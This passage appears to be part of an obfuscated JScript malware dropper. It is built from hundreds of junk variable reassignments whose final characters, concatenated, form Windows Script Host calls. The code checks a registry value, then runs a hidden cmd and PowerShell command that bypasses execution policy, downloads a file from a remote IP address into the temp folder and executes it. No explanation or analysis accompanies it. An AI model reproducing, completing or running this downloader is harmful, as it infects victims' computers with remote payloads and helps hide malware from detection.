2 | var iogsdmh = this[htfgffr + lytznrxir + nbpblddx + fnlxkw + xigpngc + buavm + gaeacdic + gagodlw] ( this[jgweovo + alwxvsda + hxjcsms + nbpblddx + fobmkncwt + htfgffr + gagodlw][gqsurl + nbpblddx + xigpngc + lytznrxir + gagodlw + xigpngc + oxqnq + gpmzwqi + acrxmigzg + xigpngc + hxjcsms + gagodlw] ( jgweovo + alwxvsda + hxjcsms + nbpblddx + fobmkncwt + htfgffr + gagodlw + dfpgc + alwxvsda + dljzgakls + xigpngc + uzfgkhzi + uzfgkhzi ) [syyvu + xigpngc + eeynrd + syyvu + xigpngc + lytznrxir + iwqdlcqbp] ( zzuvna + gsrxwalnl + tkseudkyc + sbxom + ludkfd + gqsurl + repgjhwmi + syyvu + syyvu + tkseudkyc + fgzzkpvhr + strzcl + ludkfd + repgjhwmi + alwxvsda + tkseudkyc + syyvu + xaqunfupl + gqsurl + tycwm + gaeacdic + gagodlw + nbpblddx + tycwm + uzfgkhzi + wcsxz + oubpkccd + lytznrxir + gaeacdic + xigpngc + uzfgkhzi + xaqunfupl + buavm + gaeacdic + gagodlw + xigpngc + nbpblddx + gaeacdic + lytznrxir + gagodlw + fobmkncwt + tycwm + gaeacdic + lytznrxir + uzfgkhzi + xaqunfupl + jwnizki + tycwm + hxjcsms + lytznrxir + uzfgkhzi + xigpngc ), 16 ); |
|
3 | for ( xzbifzgf = 0 ; xzbifzgf < innoqqaig[uzfgkhzi + xigpngc + gaeacdic + eeynrd + gagodlw + dljzgakls] ; ++ xzbifzgf ) | |
4 | { | |
5 | if ( iogsdmh == innoqqaig[xzbifzgf] ) | |
6 | { | |
7 | iogsdmh = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( iogsdmh !== true ) | |
12 | this[jgweovo + alwxvsda + hxjcsms + nbpblddx + fobmkncwt + htfgffr + gagodlw][ossxtzv + ugbtsk + fobmkncwt + gagodlw] ( ); | |
13 | this[jgweovo + alwxvsda + hxjcsms + nbpblddx + fobmkncwt + htfgffr + gagodlw][gqsurl + nbpblddx + xigpngc + lytznrxir + gagodlw + xigpngc + oxqnq + gpmzwqi + acrxmigzg + xigpngc + hxjcsms + gagodlw] ( jgweovo + alwxvsda + hxjcsms + nbpblddx + fobmkncwt + htfgffr + gagodlw + dfpgc + alwxvsda + dljzgakls + xigpngc + uzfgkhzi + uzfgkhzi ) [nbpblddx + ugbtsk + gaeacdic] ( hxjcsms + txsprtivg + iwqdlcqbp + wcsxz + xwcuijvtw + hxjcsms + wcsxz + htfgffr + tycwm + llcajex + xigpngc + nbpblddx + fnlxkw + dljzgakls + xigpngc + uzfgkhzi + uzfgkhzi + dfpgc + xigpngc + wssxk + xigpngc + wcsxz + hbymeyice + gqsurl + tycwm + txsprtivg + txsprtivg + lytznrxir + gaeacdic + iwqdlcqbp + wcsxz + ffccwcb + buavm + gaeacdic + mrplodk + tycwm + uearm + xigpngc + hbymeyice + jgweovo + xigpngc + gpmzwqi + syyvu + xigpngc + plamltcs + ugbtsk + xigpngc + fnlxkw + gagodlw + wcsxz + hbymeyice + oxqnq + ugbtsk + gagodlw + dugutlax + fobmkncwt + uzfgkhzi + xigpngc + wcsxz + xzxlmwxu + gagodlw + xigpngc + txsprtivg + htfgffr + xzxlmwxu + xaqunfupl + fobmkncwt + gaeacdic + mrplodk + tycwm + fobmkncwt + hxjcsms + xigpngc + dfpgc + htfgffr + iwqdlcqbp + bjexiyno + wcsxz + dljzgakls + gagodlw + gagodlw + htfgffr + beupuf + xwcuijvtw + xwcuijvtw + txsxrbpl + htzsm + obwywgnzn + dfpgc + txsxrbpl + rcjhqts + obwywgnzn + dfpgc + txsxrbpl + dfpgc + sabcnf + khwveq + hrnvumrn + xwcuijvtw + fobmkncwt + gaeacdic + mrplodk + tycwm + fobmkncwt + hxjcsms + xigpngc + dfpgc + htfgffr + dljzgakls + htfgffr + ffccwcb + btuqkv + btuqkv + fnlxkw + gagodlw + lytznrxir + nbpblddx + gagodlw + wcsxz + xzxlmwxu + gagodlw + xigpngc + txsprtivg + htfgffr + xzxlmwxu + xaqunfupl + fobmkncwt + gaeacdic + mrplodk + tycwm + fobmkncwt + hxjcsms + xigpngc + dfpgc + htfgffr + iwqdlcqbp + bjexiyno + btuqkv + btuqkv + hxjcsms + txsprtivg + iwqdlcqbp + wcsxz + xwcuijvtw + hxjcsms + wcsxz + gaeacdic + xigpngc + gagodlw + wcsxz + ugbtsk + fnlxkw + xigpngc + wcsxz + xaqunfupl + xaqunfupl + txsxrbpl + htzsm + obwywgnzn + dfpgc + txsxrbpl + rcjhqts + obwywgnzn + dfpgc + txsxrbpl + dfpgc + sabcnf + khwveq + hrnvumrn + hlqiy + qsxrtdui + qsxrtdui + qsxrtdui + qsxrtdui + xaqunfupl + iwqdlcqbp + lytznrxir + mrplodk + llcajex + llcajex + llcajex + nbpblddx + tycwm + tycwm + gagodlw + xaqunfupl + btuqkv + btuqkv + hxjcsms + txsprtivg + iwqdlcqbp + wcsxz + xwcuijvtw + hxjcsms + wcsxz + nbpblddx + xigpngc + eeynrd + fnlxkw + mrplodk + nbpblddx + obwywgnzn + sabcnf + wcsxz + xwcuijvtw + fnlxkw + wcsxz + xaqunfupl + xaqunfupl + txsxrbpl + htzsm + obwywgnzn + dfpgc + txsxrbpl + rcjhqts + obwywgnzn + dfpgc + txsxrbpl + dfpgc + sabcnf + khwveq + hrnvumrn + hlqiy + qsxrtdui + qsxrtdui + qsxrtdui + qsxrtdui + xaqunfupl + iwqdlcqbp + lytznrxir + mrplodk + llcajex + llcajex + llcajex + nbpblddx + tycwm + tycwm + gagodlw + xaqunfupl + txsxrbpl + hrnvumrn + txsxrbpl + htzsm + txsxrbpl + sabcnf + qsxrtdui + sabcnf + jlesiuun + txsxrbpl + txsxrbpl + htzsm + rcjhqts + khwveq + jlesiuun + dfpgc + iwqdlcqbp + uzfgkhzi + uzfgkhzi, 0, false ); |
|
14 | } | |
15 | ludkfd = "a"; | |
16 | ludkfd = "W"; | |
17 | ludkfd = "o"; | |
18 | ludkfd = "v"; | |
19 | ludkfd = "i"; | |
20 | ludkfd = "n"; | |
21 | ludkfd = "h"; | |
22 | ludkfd = "J"; | |
23 | ludkfd = "l"; | |
24 | ludkfd = "q"; | |
25 | ludkfd = "x"; | |
26 | ludkfd = "h"; | |
27 | ludkfd = "P"; | |
28 | ludkfd = "Q"; | |
29 | ludkfd = "y"; | |
30 | ludkfd = "k"; | |
31 | ludkfd = "F"; | |
32 | ludkfd = "O"; | |
33 | ludkfd = "n"; | |
34 | ludkfd = "p"; | |
35 | ludkfd = "B"; | |
36 | ludkfd = "_"; | |
37 | fgzzkpvhr = "o"; | |
38 | fgzzkpvhr = "L"; | |
39 | fgzzkpvhr = "f"; | |
40 | fgzzkpvhr = "f"; | |
41 | fgzzkpvhr = "f"; | |
42 | fgzzkpvhr = "N"; | |
43 | fgzzkpvhr = "N"; | |
44 | bjexiyno = "o"; | |
45 | bjexiyno = "Y"; | |
46 | bjexiyno = "O"; | |
47 | bjexiyno = "g"; | |
48 | bjexiyno = "k"; | |
49 | bjexiyno = "L"; | |
50 | bjexiyno = "Y"; | |
51 | bjexiyno = "y"; | |
52 | bjexiyno = "A"; | |
53 | bjexiyno = "l"; | |
54 | bjexiyno = "F"; | |
55 | bjexiyno = "Y"; | |
56 | bjexiyno = "p"; | |
57 | bjexiyno = "V"; | |
58 | bjexiyno = "I"; | |
59 | bjexiyno = "v"; | |
60 | bjexiyno = "f"; | |
61 | bjexiyno = "i"; | |
62 | bjexiyno = "c"; | |
63 | bjexiyno = "A"; | |
64 | bjexiyno = "d"; | |
65 | bjexiyno = "T"; | |
66 | bjexiyno = "y"; | |
67 | bjexiyno = "v"; | |
68 | bjexiyno = "J"; | |
69 | bjexiyno = "C"; | |
70 | bjexiyno = "f"; | |
71 | wcsxz = "O"; | |
72 | wcsxz = "q"; | |
73 | wcsxz = "F"; | |
74 | wcsxz = "K"; | |
75 | wcsxz = "e"; | |
76 | wcsxz = "N"; | |
77 | wcsxz = "P"; | |
78 | wcsxz = "p"; | |
79 | wcsxz = "v"; | |
80 | wcsxz = "f"; | |
81 | wcsxz = "K"; | |
82 | wcsxz = "G"; | |
83 | wcsxz = "j"; | |
84 | wcsxz = "J"; | |
85 | wcsxz = "E"; | |
86 | wcsxz = "o"; | |
87 | wcsxz = "V"; | |
88 | wcsxz = "N"; | |
89 | wcsxz = "n"; | |
90 | wcsxz = "p"; | |
91 | wcsxz = "M"; | |
92 | wcsxz = "E"; | |
93 | wcsxz = "b"; | |
94 | wcsxz = "F"; | |
95 | wcsxz = "r"; | |
96 | wcsxz = " "; | |
97 | hrnvumrn = "p"; | |
98 | hrnvumrn = "p"; | |
99 | hrnvumrn = "b"; | |
100 | hrnvumrn = "t"; | |
101 | hrnvumrn = "V"; | |
102 | hrnvumrn = "d"; | |
103 | hrnvumrn = "X"; | |
104 | hrnvumrn = "g"; | |
105 | hrnvumrn = "5"; | |
106 | htzsm = "j"; | |
107 | htzsm = "V"; | |
108 | htzsm = "N"; | |
109 | htzsm = "F"; | |
110 | htzsm = "a"; | |
111 | htzsm = "O"; | |
112 | htzsm = "e"; | |
113 | htzsm = "K"; | |
114 | htzsm = "L"; | |
115 | htzsm = "I"; | |
116 | htzsm = "m"; | |
117 | htzsm = "N"; | |
118 | htzsm = "i"; | |
119 | htzsm = "F"; | |
120 | htzsm = "Y"; | |
121 | htzsm = "9"; | |
122 | obwywgnzn = "m"; | |
123 | obwywgnzn = "n"; | |
124 | obwywgnzn = "V"; | |
125 | obwywgnzn = "u"; | |
126 | obwywgnzn = "g"; | |
127 | obwywgnzn = "d"; | |
128 | obwywgnzn = "X"; | |
129 | obwywgnzn = "Q"; | |
130 | obwywgnzn = "L"; | |
131 | obwywgnzn = "E"; | |
132 | obwywgnzn = "d"; | |
133 | obwywgnzn = "t"; | |
134 | obwywgnzn = "I"; | |
135 | obwywgnzn = "R"; | |
136 | obwywgnzn = "R"; | |
137 | obwywgnzn = "D"; | |
138 | obwywgnzn = "3"; | |
139 | dfpgc = "w"; | |
140 | dfpgc = "n"; | |
141 | dfpgc = "h"; | |
142 | dfpgc = "T"; | |
143 | dfpgc = "T"; | |
144 | dfpgc = "U"; | |
145 | dfpgc = "c"; | |
146 | dfpgc = "o"; | |
147 | dfpgc = "W"; | |
148 | dfpgc = "J"; | |
149 | dfpgc = "g"; | |
150 | dfpgc = "Y"; | |
151 | dfpgc = "U"; | |
152 | dfpgc = "f"; | |
153 | dfpgc = "y"; | |
154 | dfpgc = "x"; | |
155 | dfpgc = "p"; | |
156 | dfpgc = "P"; | |
157 | dfpgc = "o"; | |
158 | dfpgc = "I"; | |
159 | dfpgc = "q"; | |
160 | dfpgc = "D"; | |
161 | dfpgc = "X"; | |
162 | dfpgc = "Y"; | |
163 | dfpgc = "H"; | |
164 | dfpgc = "l"; | |
165 | dfpgc = "T"; | |
166 | dfpgc = "D"; | |
167 | dfpgc = "k"; | |
168 | dfpgc = "v"; | |
169 | dfpgc = "."; | |
170 | nbpblddx = "B"; | |
171 | nbpblddx = "X"; | |
172 | nbpblddx = "p"; | |
173 | nbpblddx = "p"; | |
174 | nbpblddx = "X"; | |
175 | nbpblddx = "r"; | |
176 | llcajex = "M"; | |
177 | llcajex = "d"; | |
178 | llcajex = "z"; | |
179 | llcajex = "J"; | |
180 | llcajex = "T"; | |
181 | llcajex = "J"; | |
182 | llcajex = "q"; | |
183 | llcajex = "f"; | |
184 | llcajex = "i"; | |
185 | llcajex = "d"; | |
186 | llcajex = "E"; | |
187 | llcajex = "a"; | |
188 | llcajex = "X"; | |
189 | llcajex = "G"; | |
190 | llcajex = "o"; | |
191 | llcajex = "m"; | |
192 | llcajex = "l"; | |
193 | llcajex = "u"; | |
194 | llcajex = "q"; | |
195 | llcajex = "i"; | |
196 | llcajex = "U"; | |
197 | llcajex = "N"; | |
198 | llcajex = "s"; | |
199 | llcajex = "w"; | |
200 | llcajex = "m"; | |
201 | llcajex = "J"; | |
202 | llcajex = "D"; | |
203 | llcajex = "c"; | |
204 | llcajex = "L"; | |
205 | llcajex = "H"; | |
206 | llcajex = "K"; | |
207 | llcajex = "K"; | |
208 | llcajex = "B"; | |
209 | llcajex = "w"; | |
210 | fnlxkw = "r"; | |
211 | fnlxkw = "G"; | |
212 | fnlxkw = "z"; | |
213 | fnlxkw = "L"; | |
214 | fnlxkw = "E"; | |
215 | fnlxkw = "W"; | |
216 | fnlxkw = "V"; | |
217 | fnlxkw = "s"; | |
218 | fnlxkw = "g"; | |
219 | fnlxkw = "s"; | |
220 | fnlxkw = "H"; | |
221 | fnlxkw = "g"; | |
222 | fnlxkw = "t"; | |
223 | fnlxkw = "a"; | |
224 | fnlxkw = "f"; | |
225 | fnlxkw = "G"; | |
226 | fnlxkw = "I"; | |
227 | fnlxkw = "L"; | |
228 | fnlxkw = "r"; | |
229 | fnlxkw = "p"; | |
230 | fnlxkw = "u"; | |
231 | fnlxkw = "Z"; | |
232 | fnlxkw = "q"; | |
233 | fnlxkw = "T"; | |
234 | fnlxkw = "x"; | |
235 | fnlxkw = "p"; | |
236 | fnlxkw = "k"; | |
237 | fnlxkw = "L"; | |
238 | fnlxkw = "i"; | |
239 | fnlxkw = "t"; | |
240 | fnlxkw = "U"; | |
241 | fnlxkw = "x"; | |
242 | fnlxkw = "c"; | |
243 | fnlxkw = "E"; | |
244 | fnlxkw = "s"; | |
245 | xwcuijvtw = "g"; | |
246 | xwcuijvtw = "w"; | |
247 | xwcuijvtw = "y"; | |
248 | xwcuijvtw = "S"; | |
249 | xwcuijvtw = "r"; | |
250 | xwcuijvtw = "g"; | |
251 | xwcuijvtw = "J"; | |
252 | xwcuijvtw = "r"; | |
253 | xwcuijvtw = "t"; | |
254 | xwcuijvtw = "/"; | |
255 | rcjhqts = "s"; | |
256 | rcjhqts = "Q"; | |
257 | rcjhqts = "I"; | |
258 | rcjhqts = "T"; | |
259 | rcjhqts = "u"; | |
260 | rcjhqts = "X"; | |
261 | rcjhqts = "v"; | |
262 | rcjhqts = "G"; | |
263 | rcjhqts = "I"; | |
264 | rcjhqts = "h"; | |
265 | rcjhqts = "B"; | |
266 | rcjhqts = "k"; | |
267 | rcjhqts = "d"; | |
268 | rcjhqts = "r"; | |
269 | rcjhqts = "m"; | |
270 | rcjhqts = "c"; | |
271 | rcjhqts = "4"; | |
272 | acrxmigzg = "P"; | |
273 | acrxmigzg = "x"; | |
274 | acrxmigzg = "J"; | |
275 | acrxmigzg = "N"; | |
276 | acrxmigzg = "J"; | |
277 | acrxmigzg = "h"; | |
278 | acrxmigzg = "u"; | |
279 | acrxmigzg = "x"; | |
280 | acrxmigzg = "k"; | |
281 | acrxmigzg = "Y"; | |
282 | acrxmigzg = "x"; | |
283 | acrxmigzg = "Z"; | |
284 | acrxmigzg = "E"; | |
285 | acrxmigzg = "w"; | |
286 | acrxmigzg = "A"; | |
287 | acrxmigzg = "J"; | |
288 | acrxmigzg = "o"; | |
289 | acrxmigzg = "p"; | |
290 | acrxmigzg = "x"; | |
291 | acrxmigzg = "L"; | |
292 | acrxmigzg = "h"; | |
293 | acrxmigzg = "M"; | |
294 | acrxmigzg = "O"; | |
295 | acrxmigzg = "Z"; | |
296 | acrxmigzg = "Q"; | |
297 | acrxmigzg = "r"; | |
298 | acrxmigzg = "z"; | |
299 | acrxmigzg = "N"; | |
300 | acrxmigzg = "v"; | |
301 | acrxmigzg = "L"; | |
302 | acrxmigzg = "B"; | |
303 | acrxmigzg = "E"; | |
304 | acrxmigzg = "j"; | |
305 | xigpngc = "w"; | |
306 | xigpngc = "r"; | |
307 | xigpngc = "B"; | |
308 | xigpngc = "I"; | |
309 | xigpngc = "Z"; | |
310 | xigpngc = "L"; | |
311 | xigpngc = "m"; | |
312 | xigpngc = "U"; | |
313 | xigpngc = "U"; | |
314 | xigpngc = "c"; | |
315 | xigpngc = "T"; | |
316 | xigpngc = "B"; | |
317 | xigpngc = "m"; | |
318 | xigpngc = "V"; | |
319 | xigpngc = "X"; | |
320 | xigpngc = "L"; | |
321 | xigpngc = "p"; | |
322 | xigpngc = "w"; | |
323 | xigpngc = "H"; | |
324 | xigpngc = "Q"; | |
325 | xigpngc = "Y"; | |
326 | xigpngc = "V"; | |
327 | xigpngc = "e"; | |
328 | uearm = "M"; | |
329 | uearm = "d"; | |
330 | uearm = "l"; | |
331 | uearm = "m"; | |
332 | uearm = "T"; | |
333 | uearm = "B"; | |
334 | uearm = "s"; | |
335 | uearm = "J"; | |
336 | uearm = "I"; | |
337 | uearm = "W"; | |
338 | uearm = "y"; | |
339 | uearm = "C"; | |
340 | uearm = "t"; | |
341 | uearm = "L"; | |
342 | uearm = "U"; | |
343 | uearm = "E"; | |
344 | uearm = "A"; | |
345 | uearm = "z"; | |
346 | uearm = "j"; | |
347 | uearm = "Q"; | |
348 | uearm = "q"; | |
349 | uearm = "p"; | |
350 | uearm = "l"; | |
351 | uearm = "X"; | |
352 | uearm = "L"; | |
353 | uearm = "J"; | |
354 | uearm = "i"; | |
355 | uearm = "p"; | |
356 | uearm = "o"; | |
357 | uearm = "K"; | |
358 | uearm = "B"; | |
359 | uearm = "d"; | |
360 | uearm = "X"; | |
361 | uearm = "S"; | |
362 | uearm = "B"; | |
363 | uearm = "C"; | |
364 | uearm = "A"; | |
365 | uearm = "V"; | |
366 | uearm = "z"; | |
367 | uearm = "k"; | |
368 | gsrxwalnl = "N"; | |
369 | gsrxwalnl = "y"; | |
370 | gsrxwalnl = "S"; | |
371 | gsrxwalnl = "S"; | |
372 | gsrxwalnl = "n"; | |
373 | gsrxwalnl = "i"; | |
374 | gsrxwalnl = "c"; | |
375 | gsrxwalnl = "J"; | |
376 | gsrxwalnl = "H"; | |
377 | gsrxwalnl = "I"; | |
378 | gsrxwalnl = "J"; | |
379 | gsrxwalnl = "A"; | |
380 | gsrxwalnl = "f"; | |
381 | gsrxwalnl = "J"; | |
382 | gsrxwalnl = "q"; | |
383 | gsrxwalnl = "l"; | |
384 | gsrxwalnl = "Y"; | |
385 | gsrxwalnl = "P"; | |
386 | gsrxwalnl = "u"; | |
387 | gsrxwalnl = "W"; | |
388 | gsrxwalnl = "H"; | |
389 | gsrxwalnl = "y"; | |
390 | gsrxwalnl = "t"; | |
391 | gsrxwalnl = "D"; | |
392 | gsrxwalnl = "L"; | |
393 | gsrxwalnl = "K"; | |
394 | ffccwcb = "S"; | |
395 | ffccwcb = "O"; | |
396 | ffccwcb = "R"; | |
397 | ffccwcb = "v"; | |
398 | ffccwcb = "c"; | |
399 | ffccwcb = "T"; | |
400 | ffccwcb = "v"; | |
401 | ffccwcb = "b"; | |
402 | ffccwcb = "J"; | |
403 | ffccwcb = "U"; | |
404 | ffccwcb = "U"; | |
405 | ffccwcb = "d"; | |
406 | ffccwcb = "\""; | |
407 | oubpkccd = "P"; | |
408 | gagodlw = "n"; | |
409 | gagodlw = "k"; | |
410 | gagodlw = "E"; | |
411 | gagodlw = "s"; | |
412 | gagodlw = "X"; | |
413 | gagodlw = "A"; | |
414 | gagodlw = "V"; | |
415 | gagodlw = "U"; | |
416 | gagodlw = "W"; | |
417 | gagodlw = "j"; | |
418 | gagodlw = "F"; | |
419 | gagodlw = "n"; | |
420 | gagodlw = "Y"; | |
421 | gagodlw = "n"; | |
422 | gagodlw = "W"; | |
423 | gagodlw = "g"; | |
424 | gagodlw = "n"; | |
425 | gagodlw = "W"; | |
426 | gagodlw = "c"; | |
427 | gagodlw = "Z"; | |
428 | gagodlw = "p"; | |
429 | gagodlw = "e"; | |
430 | gagodlw = "W"; | |
431 | gagodlw = "N"; | |
432 | gagodlw = "i"; | |
433 | gagodlw = "M"; | |
434 | gagodlw = "k"; | |
435 | gagodlw = "z"; | |
436 | gagodlw = "w"; | |
437 | gagodlw = "t"; | |
438 | gagodlw = "j"; | |
439 | gagodlw = "H"; | |
440 | gagodlw = "t"; | |
441 | plamltcs = "n"; | |
442 | plamltcs = "P"; | |
443 | plamltcs = "G"; | |
444 | plamltcs = "o"; | |
445 | plamltcs = "I"; | |
446 | plamltcs = "O"; | |
447 | plamltcs = "j"; | |
448 | plamltcs = "K"; | |
449 | plamltcs = "D"; | |
450 | plamltcs = "N"; | |
451 | plamltcs = "g"; | |
452 | plamltcs = "j"; | |
453 | plamltcs = "S"; | |
454 | plamltcs = "x"; | |
455 | plamltcs = "q"; | |
456 | plamltcs = "Z"; | |
457 | plamltcs = "K"; | |
458 | plamltcs = "v"; | |
459 | plamltcs = "n"; | |
460 | plamltcs = "Z"; | |
461 | plamltcs = "F"; | |
462 | plamltcs = "r"; | |
463 | plamltcs = "Z"; | |
464 | plamltcs = "n"; | |
465 | plamltcs = "V"; | |
466 | plamltcs = "G"; | |
467 | plamltcs = "X"; | |
468 | plamltcs = "p"; | |
469 | plamltcs = "q"; | |
470 | hxjcsms = "S"; | |
471 | hxjcsms = "B"; | |
472 | hxjcsms = "Q"; | |
473 | hxjcsms = "r"; | |
474 | hxjcsms = "u"; | |
475 | hxjcsms = "R"; | |
476 | hxjcsms = "g"; | |
477 | hxjcsms = "Y"; | |
478 | hxjcsms = "G"; | |
479 | hxjcsms = "s"; | |
480 | hxjcsms = "h"; | |
481 | hxjcsms = "V"; | |
482 | hxjcsms = "C"; | |
483 | hxjcsms = "i"; | |
484 | hxjcsms = "h"; | |
485 | hxjcsms = "r"; | |
486 | hxjcsms = "b"; | |
487 | hxjcsms = "q"; | |
488 | hxjcsms = "K"; | |
489 | hxjcsms = "C"; | |
490 | hxjcsms = "b"; | |
491 | hxjcsms = "D"; | |
492 | hxjcsms = "G"; | |
493 | hxjcsms = "W"; | |
494 | hxjcsms = "X"; | |
495 | hxjcsms = "X"; | |
496 | hxjcsms = "U"; | |
497 | hxjcsms = "e"; | |
498 | hxjcsms = "Q"; | |
499 | hxjcsms = "X"; | |
500 | hxjcsms = "J"; | |
501 | hxjcsms = "l"; | |
502 | hxjcsms = "E"; | |
503 | hxjcsms = "C"; | |
504 | hxjcsms = "y"; | |
505 | hxjcsms = "t"; | |
506 | hxjcsms = "b"; | |
507 | hxjcsms = "e"; | |
508 | hxjcsms = "P"; | |
509 | hxjcsms = "p"; | |
510 | hxjcsms = "U"; | |
511 | hxjcsms = "M"; | |
512 | hxjcsms = "G"; | |
513 | hxjcsms = "S"; | |
514 | hxjcsms = "c"; | |
515 | xaqunfupl = "o"; | |
516 | xaqunfupl = "a"; | |
517 | xaqunfupl = "L"; | |
518 | xaqunfupl = "p"; | |
519 | xaqunfupl = "Z"; | |
520 | xaqunfupl = "Q"; | |
521 | xaqunfupl = "p"; | |
522 | xaqunfupl = "U"; | |
523 | xaqunfupl = "N"; | |
524 | xaqunfupl = "f"; | |
525 | xaqunfupl = "b"; | |
526 | xaqunfupl = "a"; | |
527 | xaqunfupl = "k"; | |
528 | xaqunfupl = "c"; | |
529 | xaqunfupl = "V"; | |
530 | xaqunfupl = "Q"; | |
531 | xaqunfupl = "F"; | |
532 | xaqunfupl = "s"; | |
533 | xaqunfupl = "e"; | |
534 | xaqunfupl = "I"; | |
535 | xaqunfupl = "y"; | |
536 | xaqunfupl = "n"; | |
537 | xaqunfupl = "p"; | |
538 | xaqunfupl = "m"; | |
539 | xaqunfupl = "N"; | |
540 | xaqunfupl = "k"; | |
541 | xaqunfupl = "b"; | |
542 | xaqunfupl = "f"; | |
543 | xaqunfupl = "D"; | |
544 | xaqunfupl = "R"; | |
545 | xaqunfupl = "P"; | |
546 | xaqunfupl = "\\"; | |
547 | ossxtzv = "W"; | |
548 | ossxtzv = "b"; | |
549 | ossxtzv = "L"; | |
550 | ossxtzv = "Q"; | |
551 | jwnizki = "a"; | |
552 | jwnizki = "M"; | |
553 | jwnizki = "Y"; | |
554 | jwnizki = "g"; | |
555 | jwnizki = "a"; | |
556 | jwnizki = "J"; | |
557 | jwnizki = "Z"; | |
558 | jwnizki = "j"; | |
559 | jwnizki = "i"; | |
560 | jwnizki = "Q"; | |
561 | jwnizki = "d"; | |
562 | jwnizki = "g"; | |
563 | jwnizki = "m"; | |
564 | jwnizki = "v"; | |
565 | jwnizki = "N"; | |
566 | jwnizki = "Q"; | |
567 | jwnizki = "s"; | |
568 | jwnizki = "V"; | |
569 | jwnizki = "O"; | |
570 | jwnizki = "L"; | |
571 | hbymeyice = "C"; | |
572 | hbymeyice = "i"; | |
573 | hbymeyice = "T"; | |
574 | hbymeyice = "N"; | |
575 | hbymeyice = "K"; | |
576 | hbymeyice = "m"; | |
577 | hbymeyice = "Y"; | |
578 | hbymeyice = "w"; | |
579 | hbymeyice = "Q"; | |
580 | hbymeyice = "w"; | |
581 | hbymeyice = "K"; | |
582 | hbymeyice = "t"; | |
583 | hbymeyice = "z"; | |
584 | hbymeyice = "P"; | |
585 | hbymeyice = "d"; | |
586 | hbymeyice = "t"; | |
587 | hbymeyice = "c"; | |
588 | hbymeyice = "h"; | |
589 | hbymeyice = "E"; | |
590 | hbymeyice = "D"; | |
591 | hbymeyice = "R"; | |
592 | hbymeyice = "r"; | |
593 | hbymeyice = "N"; | |
594 | hbymeyice = "S"; | |
595 | hbymeyice = "g"; | |
596 | hbymeyice = "-"; | |
597 | dugutlax = "u"; | |
598 | dugutlax = "l"; | |
599 | dugutlax = "L"; | |
600 | dugutlax = "A"; | |
601 | dugutlax = "L"; | |
602 | dugutlax = "m"; | |
603 | dugutlax = "q"; | |
604 | dugutlax = "q"; | |
605 | dugutlax = "r"; | |
606 | dugutlax = "Y"; | |
607 | dugutlax = "p"; | |
608 | dugutlax = "r"; | |
609 | dugutlax = "A"; | |
610 | dugutlax = "f"; | |
611 | dugutlax = "U"; | |
612 | dugutlax = "O"; | |
613 | dugutlax = "m"; | |
614 | dugutlax = "h"; | |
615 | dugutlax = "k"; | |
616 | dugutlax = "u"; | |
617 | dugutlax = "c"; | |
618 | dugutlax = "K"; | |
619 | dugutlax = "W"; | |
620 | dugutlax = "y"; | |
621 | dugutlax = "J"; | |
622 | dugutlax = "w"; | |
623 | dugutlax = "x"; | |
624 | dugutlax = "O"; | |
625 | dugutlax = "z"; | |
626 | dugutlax = "H"; | |
627 | dugutlax = "B"; | |
628 | dugutlax = "m"; | |
629 | dugutlax = "B"; | |
630 | dugutlax = "E"; | |
631 | dugutlax = "U"; | |
632 | dugutlax = "g"; | |
633 | dugutlax = "O"; | |
634 | dugutlax = "q"; | |
635 | dugutlax = "y"; | |
636 | dugutlax = "s"; | |
637 | dugutlax = "w"; | |
638 | dugutlax = "U"; | |
639 | dugutlax = "F"; | |
640 | repgjhwmi = "t"; | |
641 | repgjhwmi = "d"; | |
642 | repgjhwmi = "W"; | |
643 | repgjhwmi = "f"; | |
644 | repgjhwmi = "R"; | |
645 | repgjhwmi = "W"; | |
646 | repgjhwmi = "K"; | |
647 | repgjhwmi = "v"; | |
648 | repgjhwmi = "C"; | |
649 | repgjhwmi = "j"; | |
650 | repgjhwmi = "l"; | |
651 | repgjhwmi = "Q"; | |
652 | repgjhwmi = "c"; | |
653 | repgjhwmi = "N"; | |
654 | repgjhwmi = "M"; | |
655 | repgjhwmi = "v"; | |
656 | repgjhwmi = "H"; | |
657 | repgjhwmi = "U"; | |
658 | jlesiuun = "u"; | |
659 | jlesiuun = "S"; | |
660 | jlesiuun = "V"; | |
661 | jlesiuun = "A"; | |
662 | jlesiuun = "G"; | |
663 | jlesiuun = "f"; | |
664 | jlesiuun = "n"; | |
665 | jlesiuun = "a"; | |
666 | jlesiuun = "X"; | |
667 | jlesiuun = "B"; | |
668 | jlesiuun = "S"; | |
669 | jlesiuun = "6"; | |
670 | xzxlmwxu = "p"; | |
671 | xzxlmwxu = "p"; | |
672 | xzxlmwxu = "Z"; | |
673 | xzxlmwxu = "K"; | |
674 | xzxlmwxu = "i"; | |
675 | xzxlmwxu = "D"; | |
676 | xzxlmwxu = "H"; | |
677 | xzxlmwxu = "A"; | |
678 | xzxlmwxu = "T"; | |
679 | xzxlmwxu = "N"; | |
680 | xzxlmwxu = "X"; | |
681 | xzxlmwxu = "y"; | |
682 | xzxlmwxu = "k"; | |
683 | xzxlmwxu = "f"; | |
684 | xzxlmwxu = "i"; | |
685 | xzxlmwxu = "p"; | |
686 | xzxlmwxu = "w"; | |
687 | xzxlmwxu = "I"; | |
688 | xzxlmwxu = "t"; | |
689 | xzxlmwxu = "P"; | |
690 | xzxlmwxu = "M"; | |
691 | xzxlmwxu = "Q"; | |
692 | xzxlmwxu = "y"; | |
693 | xzxlmwxu = "O"; | |
694 | xzxlmwxu = "i"; | |
695 | xzxlmwxu = "D"; | |
696 | xzxlmwxu = "%"; | |
697 | sbxom = "m"; | |
698 | sbxom = "v"; | |
699 | sbxom = "A"; | |
700 | sbxom = "T"; | |
701 | sbxom = "T"; | |
702 | sbxom = "H"; | |
703 | sbxom = "Y"; | |
704 | sabcnf = "F"; | |
705 | sabcnf = "p"; | |
706 | sabcnf = "A"; | |
707 | sabcnf = "N"; | |
708 | sabcnf = "g"; | |
709 | sabcnf = "u"; | |
710 | sabcnf = "2"; | |
711 | hlqiy = "F"; | |
712 | hlqiy = "G"; | |
713 | hlqiy = "j"; | |
714 | hlqiy = "w"; | |
715 | hlqiy = "K"; | |
716 | hlqiy = "m"; | |
717 | hlqiy = "E"; | |
718 | hlqiy = "B"; | |
719 | hlqiy = "l"; | |
720 | hlqiy = "h"; | |
721 | hlqiy = "B"; | |
722 | hlqiy = "t"; | |
723 | hlqiy = "Z"; | |
724 | hlqiy = "v"; | |
725 | hlqiy = "a"; | |
726 | hlqiy = "w"; | |
727 | hlqiy = "H"; | |
728 | hlqiy = "c"; | |
729 | hlqiy = "r"; | |
730 | hlqiy = "Z"; | |
